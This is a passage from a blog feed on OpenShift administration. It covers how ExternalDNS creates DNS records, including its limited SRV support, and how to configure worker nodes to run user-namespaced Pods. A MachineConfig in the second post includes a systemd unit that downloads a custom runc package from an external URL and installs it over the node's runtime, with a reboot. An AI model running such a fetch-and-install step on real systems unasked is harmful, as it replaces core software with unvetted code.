controller will use the main cluster secret to authenticate to
Google Cloud.</p></li>
<li><p><strong><code>source</code></strong> specifies which kinds of objects the controller will
monitor to determine the DNS records to be created/managed. We
configure the controller to watch Service objects. Further
configuration is specified in subfields:</p>
<ul>
<li><p><strong><code>serviceType</code></strong> restricts the type(s) of Service objects to be
considered.</p></li>
<li><p><strong><code>labelFilter</code></strong> can be set to further restrict the set of
source objects by matching on the <code>label</code> field. In this
example, we only match Service objects with label <code>app: echo</code>.</p></li>
<li><p><strong><code>fqdnTemplate</code></strong> specifies how to derive the fully qualified
DNS name from the Service object.</p></li>
<li><p><strong><code>hostnameAnnotation</code></strong> can be set to <code>Allow</code> to allow the FQDN
to be specified via the
<code>external-dns.alpha.kubernetes.io/hostname</code> annotation on the
Service object. The default value is <code>Ignore</code>, in which case
<code>fqdnTemplate</code> is required.</p></li>
</ul></li>
</ul>
<p>Aside from <code>type: Service</code>, the <code>ExternalDNS</code> CR also recognises
<code>type: OpenShiftRoute</code>. This type uses <code>Route</code> objects as the
source, creating <code>CNAME</code> records to alias the FQDN derived from the
<code>Route</code> object to the canonical DNS name of the ingress controller.
This isn’t the behaviour I’m looking for, so the rest of this
article focuses on the behaviour for <code>Service</code> sources.</p>
<h2 id="creating-the-externaldns-controller">Creating the ExternalDNS controller <a href="#creating-the-externaldns-controller" class="section">§</a></h2>
<p>Now that we have defined an <code>ExternalDNS</code> custom resource, let’s
create it and see what happens. I would like to watch the logs of
the ExternalDNS Operator during this operation.</p>
<p>Earlier we saw that the name of the operator Pod is
<code>pod/external-dns-operator-594b465984-r2pc5</code>. This Pod has two
containers:</p>
<pre class="shell"><code>% oc get -o json -n external-dns-operator \
    pod/external-dns-operator-594b465984-r2pc5 \
    | jq &#39;.status.containerStatuses[].name&#39;
&quot;kube-rbac-proxy&quot;
&quot;operator&quot;</code></pre>
<p>The container named <code>operator</code> is the one we are interested in.
We can watch its log output like so:</p>
<pre class="shell"><code>% oc logs -n external-dns-operator --tail 2 --follow \
    external-dns-operator-594b465984-r2pc5 operator
2022-03-22T04:41:06.625Z        INFO    controller-runtime.manager.controller.external_dns_controller   Starting workers        {&quot;worker count&quot;: 1}
2022-03-22T04:41:06.626Z        INFO    controller-runtime.manager.controller.credentials_secret_controller     Starting workers        {&quot;worker count&quot;: 1}
... (waiting for more output)</code></pre>
<p>Now, in another terminal, create the <code>ExternalDNS</code> CR object:</p>
<pre class="shell"><code>% oc create -f externaldns-test.yaml
externaldns.externaldns.olm.openshift.io/test created</code></pre>
<p>Log output shows the ExternalDNS Operator responding to the
appearance of the <code>externaldns/test</code> CR:</p>
<pre><code>controller-runtime.webhook.webhooks     received request        {&quot;webhook&quot;: &quot;/validate-externaldns-olm-openshift-io-v1alpha1-externaldns&quot;, &quot;UID&quot;: &quot;cf2fb876-9ddd-45a8-88b8-5cc0344fb5cc&quot;, &quot;kind&quot;: &quot;externaldns.olm.openshift.io/v1alpha1, Kind=ExternalDNS&quot;, &quot;resource&quot;: {&quot;group&quot;:&quot;externaldns.olm.openshift.io&quot;,&quot;version&quot;:&quot;v1alpha1&quot;,&quot;resource&quot;:&quot;externaldnses&quot;}}
validating-webhook      validate create {&quot;name&quot;: &quot;test&quot;}
controller-runtime.webhook.webhooks     wrote response  {&quot;webhook&quot;: &quot;/validate-externaldns-olm-openshift-io-v1alpha1-externaldns&quot;, &quot;code&quot;: 200, &quot;reason&quot;: &quot;&quot;, &quot;UID&quot;: &quot;cf2fb876-9ddd-45a8-88b8-5cc0344fb5cc&quot;, &quot;allowed&quot;: true}
external_dns_controller reconciling externalDNS {&quot;externaldns&quot;: &quot;/test&quot;}
…</code></pre>
<p>And if we look in the <em>operand</em> namespace (<code>external-dns</code>) we see
a Pod running:</p>
<pre class="shell"><code>% oc get -n external-dns pod
NAME                                 READY   STATUS    RESTARTS   AGE
external-dns-test-865ffff756-45d44   1/1     Running   0          54s</code></pre>
<p>And if you want to see what an ExternalDNS <em>controller</em> is up to,
you can watch its logs:</p>
<pre class="shell"><code>% oc logs -n external-dns --tail 1 --follow \
    pod/external-dns-test-865ffff756-45d44
time=&quot;2022-03-23T12:26:18Z&quot; level=info msg=&quot;All records are already up to date&quot;
... (waiting for more output)</code></pre>
<h2 id="observing-record-creation">Observing record creation <a href="#observing-record-creation" class="section">§</a></h2>
<p>After creating the ExternalDNS instance, I found Google Cloud DNS
zone for my cluster and queried its records. How to interact with
the cloud provider depends on which cloud provider the cluster is
hosted on, so I won’t provide details. The existing records are:</p>
<pre><code>ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  NS    21600  ns-gcp-private.googledomains.com.
ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  SOA   21600  ns-gcp-private.googledomains.com.
api.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  A     60     10.0.0.2
api-int.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  A     60     10.0.0.2
*.apps.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  A     30     35.223.148.37</code></pre>
<div class="note">
<p>This is a <em>private</em> zone specific to my cluster. Some non-routable
addresses appear. I haven’t figured out how to update the records
in the public zone yet. I’m confident this is not a problem with
ExternalDNS. Rather, I put it down to my lack of familiarity with
how to configure it, and with Google Cloud DNS.</p>
</div>
<p>We can see that in addition to the expected <code>NS</code> and <code>SOA</code> records,
there are <code>A</code> records for the API server and a wildcard <code>A</code> record
for the main ingress controller.</p>
<p>Next I create the following Service:</p>
<div class="sourceCode" id="cb14"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb14-1"><a href="#cb14-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb14-2"><a href="#cb14-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Service</span></span>
<span id="cb14-3"><a href="#cb14-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb14-4"><a href="#cb14-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> echo-tcp</span></span>
<span id="cb14-5"><a href="#cb14-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">labels</span><span class="kw">:</span></span>
<span id="cb14-6"><a href="#cb14-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb14-7"><a href="#cb14-7" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb14-8"><a href="#cb14-8" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">type</span><span class="kw">:</span><span class="at"> LoadBalancer</span></span>
<span id="cb14-9"><a href="#cb14-9" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">selector</span><span class="kw">:</span></span>
<span id="cb14-10"><a href="#cb14-10" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb14-11"><a href="#cb14-11" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">ports</span><span class="kw">:</span></span>
<span id="cb14-12"><a href="#cb14-12" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> tcpecho</span></span>
<span id="cb14-13"><a href="#cb14-13" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">protocol</span><span class="kw">:</span><span class="at"> TCP</span></span>
<span id="cb14-14"><a href="#cb14-14" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">port</span><span class="kw">:</span><span class="at"> </span><span class="dv">12345</span></span></code></pre></div>
<p>Note that it has the <code>app: echo</code> label and has <code>type: LoadBalancer</code>,
satisfying the match criteria of the <code>externaldns/test</code> controller.
Create the service and observe its public IP address:</p>
<pre class="shell"><code>% oc create -f service-echo.yaml
service/echo-tcp created

% oc get service/echo-tcp \
    -o jsonpath=&#39;{.status.loadBalancer}&#39;
{&quot;ingress&quot;:[{&quot;ip&quot;:&quot;35.188.22.139&quot;}]}</code></pre>
<p>After creating the Service, two new records appeared in the zone:</p>
<pre><code>echo-tcp.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  A     300    35.188.22.139
external-dns-echo-tcp.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  TXT   300    &quot;heritage=external-dns,external-dns/owner=external-dns-test,external-dns/resource=service/test/echo-tcp&quot;</code></pre>
<p>The <code>A</code> record resolves the DNS name to the load balancer’s IP
address. Nothing surprising here.</p>
<p>The <code>TXT</code> record is the for the name <code>external-dns-echo-tcp.…</code> and
contains some metadata about the “owner” of the corresponding <code>A</code>
record. Specifically, it identifies the Service object that is the
<em>source</em> of the record. I am not 100% sure, but it seems to also
contain information about the ExternalDNS controller that created
the record.</p>
<p>When I first saw the TXT records, I theorised that the ExternalDNS
controller uses the TXT records to find “obsolete” records and
delete them. This would occur, for example, when the Service is
deleted. Indeed, deleting <code>service/echo-tcp</code> resulted in the
removal of both the <code>A</code> and <code>TXT</code> records.</p>
<h2 id="srv-records-for-loadbalancer-services">SRV records for <code>LoadBalancer</code> Services <a href="#srv-records-for-loadbalancer-services" class="section">§</a></h2>
<p>Kubernetes’ internal DNS system follows a <a href="https://github.com/kubernetes/dns/blob/master/docs/specification.md">DNS-based service
discovery</a> specification. In addition to <code>A</code>/<code>AAAA</code>
records, <code>SRV</code> records are created to locate service endpoints (port
and target DNS name) based on service name and transport protocol
(TCP or UDP). SRV records are an important part of several
protocols as used in the real world, including Kerberos, SIP, LDAP
and XMPP. <code>SRV</code> records have the following shape:</p>
<pre><code>_&lt;service&gt;._&lt;proto&gt;.&lt;domain&gt; &lt;ttl&gt;
    &lt;class&gt; SRV &lt;priority&gt; &lt;weight&gt; &lt;port&gt; &lt;target&gt;</code></pre>
<p>A record to locate an organisation’s LDAP server might look like:</p>
<pre><code>_ldap._tcp.example.net 300
    IN SRV 10 5 389 ldap.corp.example.net</code></pre>
<p>Although the current system has a critical deficiency for
applications that use SRV records and operate on both TCP and UDP
(see my <a href="2020-12-08-k8s-srv-limitation.html">previous blog post</a>)
for most applications it works well. Unfortunately, ExternalDNS
does not follow the DNS spec and does not create SRV records for
Services.</p>
<p>I am not sure why this is the case. Perhaps ExternalDNS even
pre-dates the SRV aspects of the Kubernetes DNS specification. Or
the need might not have been recognised or deemed sufficiently
critical to address this gap.</p>
<p>As it happens, there is <a href="https://github.com/kubernetes-sigs/external-dns/pull/1330">an abandoned pull request</a> from two years
ago that sought to add SRV record generation to ExternalDNS and
bring it in line with the spec. The maintainers seemed receptive,
but the PR author no longer needed the feature and closed it. So I
think there is reason to hope that the feature might eventually make
it into ExternalDNS. Perhaps our team will drive it… we need SRV
records, and it would probably be better to enhance ExternalDNS than
to build our own solution from scratch.</p>
<h2 id="srv-records-for-nodeport-services">SRV records for <code>NodePort</code> services <a href="#srv-records-for-nodeport-services" class="section">§</a></h2>
<p>I said that ExternalDNS does not support SRV records, but there is
one exception to that. ExternalDNS <em>does</em> create SRV records for
Services of <code>type: NodePort</code>. This is not an appropriate solution
for our application, but we can still play with it and get a feel
for how it might work similarly for <code>LoadBalancer</code> Services.</p>
<p>First, we have to modify <code>externaldns/test</code> to add <code>NodePort</code> to the
list of Service types. Update <code>externaldns-test.yaml</code>:</p>
<div class="sourceCode" id="cb19"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb19-1"><a href="#cb19-1" aria-hidden="true" tabindex="-1"></a><span class="at">…</span></span>
<span id="cb19-2"><a href="#cb19-2" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">service</span><span class="kw">:</span></span>
<span id="cb19-3"><a href="#cb19-3" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">serviceType</span><span class="kw">:</span></span>
<span id="cb19-4"><a href="#cb19-4" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> LoadBalancer</span></span>
<span id="cb19-5"><a href="#cb19-5" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> NodePort</span></span>
<span id="cb19-6"><a href="#cb19-6" aria-hidden="true" tabindex="-1"></a><span class="at">…</span></span></code></pre></div>
<p>And apply updated configuration:</p>
<pre class="shell"><code>% oc replace -f externaldns-test.yaml
externaldns.externaldns.olm.openshift.io/test replaced</code></pre>
<p>Now create a new <code>NodePort</code> Service. <code>service-nodeport.yaml</code>:</p>
<div class="sourceCode" id="cb21"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb21-1"><a href="#cb21-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb21-2"><a href="#cb21-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Service</span></span>
<span id="cb21-3"><a href="#cb21-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb21-4"><a href="#cb21-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> nodeport</span></span>
<span id="cb21-5"><a href="#cb21-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">labels</span><span class="kw">:</span></span>
<span id="cb21-6"><a href="#cb21-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb21-7"><a href="#cb21-7" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb21-8"><a href="#cb21-8" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">type</span><span class="kw">:</span><span class="at"> NodePort</span></span>
<span id="cb21-9"><a href="#cb21-9" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">selector</span><span class="kw">:</span></span>
<span id="cb21-10"><a href="#cb21-10" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb21-11"><a href="#cb21-11" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">ports</span><span class="kw">:</span></span>
<span id="cb21-12"><a href="#cb21-12" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> nodeport</span></span>
<span id="cb21-13"><a href="#cb21-13" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">protocol</span><span class="kw">:</span><span class="at"> TCP</span></span>
<span id="cb21-14"><a href="#cb21-14" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">port</span><span class="kw">:</span><span class="at"> </span><span class="dv">12345</span></span></code></pre></div>
<pre class="shell"><code>% oc create -f service-nodeport.yaml
service/nodeport created</code></pre>
<p>The ExternalDNS controller log output shows it generating an <code>SRV</code>
record for the Service (wrapped for clarity):</p>
<pre><code>…
time=&quot;…&quot; level=debug msg=&quot;Endpoints generated from service:
default/nodeport:
[ _nodeport._tcp.nodeport.ci-ln-8hkfrzk-72292.origin-ci-int-gce.dev.rhcloud.com 0
    IN SRV  0 50 30632
    nodeport.ci-ln-8hkfrzk-72292.origin-ci-int-gce.dev.rhcloud.com []
  nodeport.ci-ln-8hkfrzk-72292.origin-ci-int-gce.dev.rhcloud.com 0
    IN A  10.0.0.4;10.0.0.5;10.0.128.3;10.0.128.2;10.0.128.4;10.0.0.3 []
]&quot;
…</code></pre>
<p>Unfortunately, the <code>SRV</code> record didn’t actually make it to the
Google Cloud DNS zone. I haven’t worked out why, yet. The <code>A</code>
record does get created; it’s only the <code>SRV</code> record that is missing.
I’ll update this article if/when I work out why the <code>SRV</code> record
goes.</p>
<h2 id="conclusion">Conclusion <a href="#conclusion" class="section">§</a></h2>
<p>The ExternalDNS system is intended to automatically manage public
DNS records for Kubernetes-hosted applications. It can
automatically create <code>CNAME</code> records for OpenShift Routes and
<code>A</code>/<code>AAAA</code> records for Services, including <code>LoadBalancer</code> services.
For applications that use <code>A</code>/<code>AAAA</code> and <code>CNAME</code> records, it works
well.</p>
<p>Unfortunately, <code>SRV</code> records are not well supported. Certainly, it
does not meet the needs of typical applications that use <code>SRV</code>
records. Operators of such applications currently have one of two
options: either manage the records manually (do not want), or
implement the required automation yourselves (e.g. in the
application’s <em>operator</em> program).</p>
<p>The best way forward is to implement better support for <code>SRV</code>
records in ExternalDNS itself, so everyone can benefit through
shared effort and maintainership vested in the Kubernetes SIG. I
shall file a ticket and perhaps restart discussions in the
<a href="https://github.com/kubernetes-sigs/external-dns/pull/1330">abandoned pull request</a> with a view to getting this
critical feature on the ExternalDNS roadmap. The extent of
involvement of myself or my team in implementing or driving this
feature work will be determined later.</p>]]></summary>
</entry>
<entry>
    <title>Running Pods in user namespaces without privileged SCCs</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2022-02-02-openshift-user-ns-without-anyuid.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2022-02-02-openshift-user-ns-without-anyuid.html</id>
    <published>2022-02-02T00:00:00Z</published>
    <updated>2022-02-02T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="running-pods-in-user-namespaces-without-privileged-sccs">Running Pods in user namespaces without privileged SCCs</h1>
<p>In <a href="2021-07-22-openshift-systemd-workload-demo.html">previous posts</a> I demonstrated how to run workloads in an
isolated user namespace on OpenShift. There are still come caveats
to doing this. One of these relates to <em>Security Context
Constraints (SCCs)</em>, a security policy mechanism in OpenShift. In
particular, it appeared necessary to admit the Pod via the <code>anyuid</code>
SCC, or one with similar high privileges. This meant that although
the workload itself runs under unprivileged UIDs, the account that
creates the Pod would need privileges to create Pods that run under
arbitrary host UIDs. This is not a desirable situation.</p>
<p>I have investigated that matter further, and it turns out that you
<em>can</em> run a workload in a user namespace even via the default
<code>restricted</code> SCC. But the configuration is not intuitive, and the
reasons <em>why</em> it must be configured that way are convoluted. In
this post I explain the challenges that arise when running a user
namespaced Pod under the <code>restricted</code> SCC, and demonstrate the
solution.</p>
<div class="note">
<p>This post assumes a basic knowledge of Security Context Constraints.
If you are unfamiliar with SCCs, the DevConf.cz 2022 presentation
<em>Introduction to Security Context Constraints</em> (<a href="https://static.sched.com/hosted_files/devconfcz2022/d5/%5BDevConf.CZ%2022%5D%20SCCs%20Presentation.pdf">slides</a>,
<a href="https://www.youtube.com/watch?v=MrYSUmk-nr4">video</a>) by Alberto Losada and Mario Vázquez will bring you up to
speed.</p>
</div>
<h2 id="cluster-configuration">Cluster configuration <a href="#cluster-configuration" class="section">§</a></h2>
<p>I am testing on an OpenShift 4.10 (pre-release) cluster. Some
changes to worker node configuration are required. The following
<code>MachineConfig</code> object defines those changes:</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> machineconfiguration.openshift.io/v1</span></span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> MachineConfig</span></span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">labels</span><span class="kw">:</span></span>
<span id="cb1-5"><a href="#cb1-5" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">machineconfiguration.openshift.io/role</span><span class="kw">:</span><span class="at"> worker</span></span>
<span id="cb1-6"><a href="#cb1-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> idm-4-10</span></span>
<span id="cb1-7"><a href="#cb1-7" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb1-8"><a href="#cb1-8" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">kernelArguments</span><span class="kw">:</span></span>
<span id="cb1-9"><a href="#cb1-9" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> systemd.unified_cgroup_hierarchy=1</span></span>
<span id="cb1-10"><a href="#cb1-10" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> cgroup_no_v1=&quot;all&quot;</span></span>
<span id="cb1-11"><a href="#cb1-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> psi=1</span></span>
<span id="cb1-12"><a href="#cb1-12" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">config</span><span class="kw">:</span></span>
<span id="cb1-13"><a href="#cb1-13" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">ignition</span><span class="kw">:</span></span>
<span id="cb1-14"><a href="#cb1-14" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">version</span><span class="kw">:</span><span class="at"> </span><span class="fl">3.1.0</span></span>
<span id="cb1-15"><a href="#cb1-15" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">systemd</span><span class="kw">:</span></span>
<span id="cb1-16"><a href="#cb1-16" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">units</span><span class="kw">:</span></span>
<span id="cb1-17"><a href="#cb1-17" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;override-runc.service&quot;</span></span>
<span id="cb1-18"><a href="#cb1-18" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">enabled</span><span class="kw">:</span><span class="at"> </span><span class="ch">true</span></span>
<span id="cb1-19"><a href="#cb1-19" aria-hidden="true" tabindex="-1"></a><span class="fu">        contents</span><span class="kw">: </span><span class="ch">|</span></span>
<span id="cb1-20"><a href="#cb1-20" aria-hidden="true" tabindex="-1"></a>          [Unit]</span>
<span id="cb1-21"><a href="#cb1-21" aria-hidden="true" tabindex="-1"></a>          Description=Install runc override</span>
<span id="cb1-22"><a href="#cb1-22" aria-hidden="true" tabindex="-1"></a>          After=network-online.target rpm-ostreed.service</span>
<span id="cb1-23"><a href="#cb1-23" aria-hidden="true" tabindex="-1"></a>          [Service]</span>
<span id="cb1-24"><a href="#cb1-24" aria-hidden="true" tabindex="-1"></a>          ExecStart=/bin/sh -c &#39;rpm -q runc-1.0.3-992.rhaos4.10.el8.x86_64 || rpm-ostree override replace --reboot https://ftweedal.fedorapeople.org/runc-1.0.3-992.rhaos4.10.el8.x86_64.rpm&#39;</span>
<span id="cb1-25"><a href="#cb1-25" aria-hidden="true" tabindex="-1"></a>          Restart=on-failure</span>
<span id="cb1-26"><a href="#cb1-26" aria-hidden="true" tabindex="-1"></a>          [Install]</span>
<span id="cb1-27"><a href="#cb1-27" aria-hidden="true" tabindex="-1"></a>          WantedBy=multi-user.target</span>
<span id="cb1-28"><a href="#cb1-28" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">storage</span><span class="kw">:</span></span>
<span id="cb1-29"><a href="#cb1-29" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">files</span><span class="kw">:</span></span>
<span id="cb1-30"><a href="#cb1-30" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">path</span><span class="kw">:</span><span class="at"> /etc/subuid</span></span>
<span id="cb1-31"><a href="#cb1-31" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">overwrite</span><span class="kw">:</span><span class="at"> </span><span class="ch">true</span></span>
<span id="cb1-32"><a href="#cb1-32" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">contents</span><span class="kw">:</span></span>
<span id="cb1-33"><a href="#cb1-33" aria-hidden="true" tabindex="-1"></a><span class="at">          </span><span class="fu">source</span><span class="kw">:</span><span class="at"> data:text/plain;charset=utf-8;base64,Y29yZToxMDAwMDA6NjU1MzYKY29udGFpbmVyczoyMDAwMDA6MjY4NDM1NDU2Cg==</span></span>
<span id="cb1-34"><a href="#cb1-34" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">path</span><span class="kw">:</span><span class="at"> /etc/subgid</span></span>
<span id="cb1-35"><a href="#cb1-35" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">overwrite</span><span class="kw">:</span><span class="at"> </span><span class="ch">true</span></span>
<span id="cb1-36"><a href="#cb1-36" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">contents</span><span class="kw">:</span></span>
<span id="cb1-37"><a href="#cb1-37" aria-hidden="true" tabindex="-1"></a><span class="at">          </span><span class="fu">source</span><span class="kw">:</span><span class="at"> data:text/plain;charset=utf-8;base64,Y29yZToxMDAwMDA6NjU1MzYKY29udGFpbmVyczoyMDAwMDA6MjY4NDM1NDU2Cg==</span></span>
<span id="cb1-38"><a href="#cb1-38" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">path</span><span class="kw">:</span><span class="at"> /etc/crio/crio.conf.d/99-crio-userns.conf</span></span>
<span id="cb1-39"><a href="#cb1-39" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">overwrite</span><span class="kw">:</span><span class="at"> </span><span class="ch">true</span></span>
<span id="cb1-40"><a href="#cb1-40" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">contents</span><span class="kw">:</span></span>
<span id="cb1-41"><a href="#cb1-41" aria-hidden="true" tabindex="-1"></a><span class="at">          </span><span class="fu">source</span><span class="kw">:</span><span class="at"> data:text/plain;charset=utf-8;base64,W2NyaW8ucnVudGltZS53b3JrbG9hZHMub3BlbnNoaWZ0LXVzZXJuc10KYWN0aXZhdGlvbl9hbm5vdGF0aW9uID0gImlvLm9wZW5zaGlmdC51c2VybnMiCmFsbG93ZWRfYW5ub3RhdGlvbnMgPSBbCiAgImlvLmt1YmVybmV0ZXMuY3JpLW8udXNlcm5zLW1vZGUiLAogICJpby5rdWJlcm5ldGVzLmNyaS1vLmNncm91cDItbW91bnQtaGllcmFyY2h5LXJ3IiwKICAiaW8ua3ViZXJuZXRlcy5jcmktby5EZXZpY2VzIgpdCg==</span></span></code></pre></div>
<p>The main parts of this <code>MachineConfig</code> are:</p>
<ul>
<li><p>The <strong><code>kernelArguments</code></strong> enable cgroupsv2, which are not strictly
required for this demo, but are required for running systemd-based
workloads.</p></li>
<li><p>The <strong><code>override-runc.service</code></strong> systemd unit installs a custom
version of runc that implements the new <a href="https://github.com/opencontainers/runtime-spec/blob/8958f93039ab90be53d803cd7e231a775f644451/config-linux.md#cgroup-ownership">OCI Runtime Specification
cgroup ownership semantics</a>.
This should be the default behaviour in future versions of
OpenShift, perhaps as soon as OpenShift 4.11.</p></li>
<li><p><strong><code>/etc/subuid</code></strong> and <strong><code>/etc/subgid</code></strong> provide a sub-id mapping range
for CRI-O to use when creating Pods with user namespaces.</p></li>
<li><p><strong><code>/etc/crio/crio.conf.d/99-crio-userns.conf</code></strong> defines the
<code>io.openshift.userns</code> workload type for CRI-O. It is also not
strictly necessary for this demo but is required for systemd-based
workloads to run successfully. The default CRI-O configuration in
OpenShift 4.10 provides the <code>io.openshift.builder</code> workload type,
which is sufficient if your workload does not need to manage
cgroups.</p></li>
</ul>
<p>Aside from the node configuration changes, I (as cluster admin) also
created project and user account to use for the subsequent steps:</p>
<pre class="shell"><code>% oc new-project test
Now using project &quot;test&quot; on server &quot;https://api.ci-ln-5rkyxfb-72292.origin-ci-int-gce.dev.rhcloud.com:6443&quot;.
…

% oc create user test
user.user.openshift.io/test created

% oc adm policy add-role-to-user edit test
clusterrole.rbac.authorization.k8s.io/edit added: &quot;test&quot;</code></pre>
<p>I did not assign any special SCCs to the <code>test</code> user account.</p>
<div class="note">
<p>Remember to wait for the Machine Config Operator to finish updating
the worker nodes before proceeding with Pod creation. You can use
<code>oc wait</code> to await this condition:</p>
<pre class="shell"><code>% oc wait mcp/worker \
    --for condition=updated --timeout=-1s</code></pre>
</div>
<h2 id="problem-demonstration">Problem demonstration <a href="#problem-demonstration" class="section">§</a></h2>
<p>The objective is to run a Pod in a user namespace, with that Pod
being admitted via the default <code>restricted</code> SCC. We will start with
the following Pod definition:</p>
<div class="sourceCode" id="cb4"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb4-1"><a href="#cb4-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb4-2"><a href="#cb4-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Pod</span></span>
<span id="cb4-3"><a href="#cb4-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb4-4"><a href="#cb4-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> fedora</span></span>
<span id="cb4-5"><a href="#cb4-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">annotations</span><span class="kw">:</span></span>
